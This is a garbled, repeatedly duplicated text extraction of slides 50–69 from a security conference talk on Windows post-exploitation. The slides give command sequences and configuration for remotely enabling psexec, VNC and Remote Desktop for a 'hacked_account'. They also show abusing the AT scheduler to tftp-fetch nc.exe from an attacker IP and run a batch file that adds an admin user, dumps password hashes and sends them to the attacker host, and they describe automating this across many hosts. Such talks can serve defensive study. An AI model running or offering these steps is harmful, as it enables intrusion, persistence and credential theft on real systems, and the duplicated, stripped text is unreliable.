ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
